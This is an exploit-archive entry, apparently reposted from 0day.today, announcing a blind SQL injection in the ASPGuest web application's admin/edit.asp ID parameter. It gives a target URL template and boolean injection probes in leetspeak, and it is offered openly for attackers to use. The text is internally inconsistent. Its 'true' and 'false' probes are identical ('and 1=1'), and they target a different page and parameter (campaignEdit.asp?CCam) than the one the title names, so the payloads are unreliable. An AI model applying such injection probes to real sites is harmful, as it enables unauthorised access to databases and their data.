id: 10272
date: 12/16/2009
title: ASPGuest (edit.asp ID) Blind SQL Injection
author: R3d-D3v!L
cves: 

==========================================
ASPGuest (edit.asp ID) Blind SQL Injection
==========================================

[*] Err0r C0N50L3:
 
[*] www.target.com/[path]/admin/edit.asp?ID={EV!L blind sql}
 
 
[*] EV!L BL!ND sql
 
[*] 7Ru3 : campaignEdit.asp?CCam=1 and 1=1
 
[*] f4L53: campaignEdit.asp?CCam=1 and 1=1
 
 
N073:
 
! 7h!/\/k u can f!nd m0r3
 
just let your m1nd breath ;)



#  0day.today [2023-03-23]  #